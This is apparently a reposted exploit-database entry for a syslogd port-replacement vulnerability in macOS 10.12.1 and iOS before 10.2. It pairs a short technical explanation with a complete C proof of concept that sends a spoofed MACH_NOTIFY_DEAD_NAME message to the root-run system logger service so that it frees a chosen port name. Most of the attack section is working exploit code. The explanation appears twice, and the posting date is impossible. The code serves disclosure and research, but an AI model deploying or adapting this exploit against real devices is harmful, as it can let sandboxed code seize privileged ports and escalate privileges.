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MacOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacemen

Posted on 30 November -0001

<HTML><HEAD><TITLE>macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacemen</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>/* syslogd (running as root) hosts the com.apple.system.logger mach service. It's part of the system.sb sandbox profile and so reachable from a lot of sandboxed contexts. Here's a snippet from its mach message handling loop listening on the service port: ks = mach_msg(&(request->head), rbits, 0, rqs, global.listen_set, 0, MACH_PORT_NULL); ... if (request->head.msgh_id == MACH_NOTIFY_DEAD_NAME) { deadname = (mach_dead_name_notification_t *)request; dispatch_async(asl_server_queue, ^{ cancel_session(deadname->not_port); /* dead name notification includes a dead name right */ mach_port_deallocate(mach_task_self(), deadname->not_port); free(request); }); An attacker with a send-right to the service can spoof a MACH_NOTIFY_DEAD_NAME message and cause an arbitrary port name to be passed to mach_port_deallocate as deadname->not_port doesn't name a port right but is a mach_port_name_t which is just a controlled integer. An attacker could cause syslogd to free a privilged port name and get it reused to name a port for which the attacker holds a receive right. Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555) */ // ianbeer #if 0 MacOS/iOS arbitrary port replacement in syslogd syslogd (running as root) hosts the com.apple.system.logger mach service. It's part of the system.sb sandbox profile and so reachable from a lot of sandboxed contexts. Here's a snippet from its mach message handling loop listening on the service port: ks = mach_msg(&(request->head), rbits, 0, rqs, global.listen_set, 0, MACH_PORT_NULL); ... if (request->head.msgh_id == MACH_NOTIFY_DEAD_NAME) { deadname = (mach_dead_name_notification_t *)request; dispatch_async(asl_server_queue, ^{ cancel_session(deadname->not_port); /* dead name notification includes a dead name right */ mach_port_deallocate(mach_task_self(), deadname->not_port); free(request); }); An attacker with a send-right to the service can spoof a MACH_NOTIFY_DEAD_NAME message and cause an arbitrary port name to be passed to mach_port_deallocate as deadname->not_port doesn't name a port right but is a mach_port_name_t which is just a controlled integer. An attacker could cause syslogd to free a privilged port name and get it reused to name a port for which the attacker holds a receive right. Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555) #endif #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <servers/bootstrap.h> #include <mach/mach.h> #include <mach/ndr.h> char* service_name = "com.apple.system.logger"; struct notification_msg { mach_msg_header_t not_header; NDR_record_t NDR; mach_port_name_t not_port; }; mach_port_t lookup(char* name) { mach_port_t service_port = MACH_PORT_NULL; kern_return_t err = bootstrap_look_up(bootstrap_port, name, &service_port); if(err != KERN_SUCCESS){ printf("unable to look up %s ", name); return MACH_PORT_NULL; } return service_port; } int main() { kern_return_t err; mach_port_t service_port = lookup(service_name); mach_port_name_t target_port = 0x1234; // the name of the port in the target namespace to destroy printf("%d ", getpid()); printf("service port: %x ", service_port); struct notification_msg not = {0}; not.not_header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); not.not_header.msgh_size = sizeof(struct notification_msg); not.not_header.msgh_remote_port = service_port; not.not_header.msgh_local_port = MACH_PORT_NULL; not.not_header.msgh_id = 0110; // MACH_NOTIFY_DEAD_NAME not.NDR = NDR_record; not.not_port = target_port; // send the fake notification message err = mach_msg(&not.not_header, MACH_SEND_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(struct notification_msg), 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); printf("fake notification message: %s ", mach_error_string(err)); return 0; } </BODY></HTML>

 

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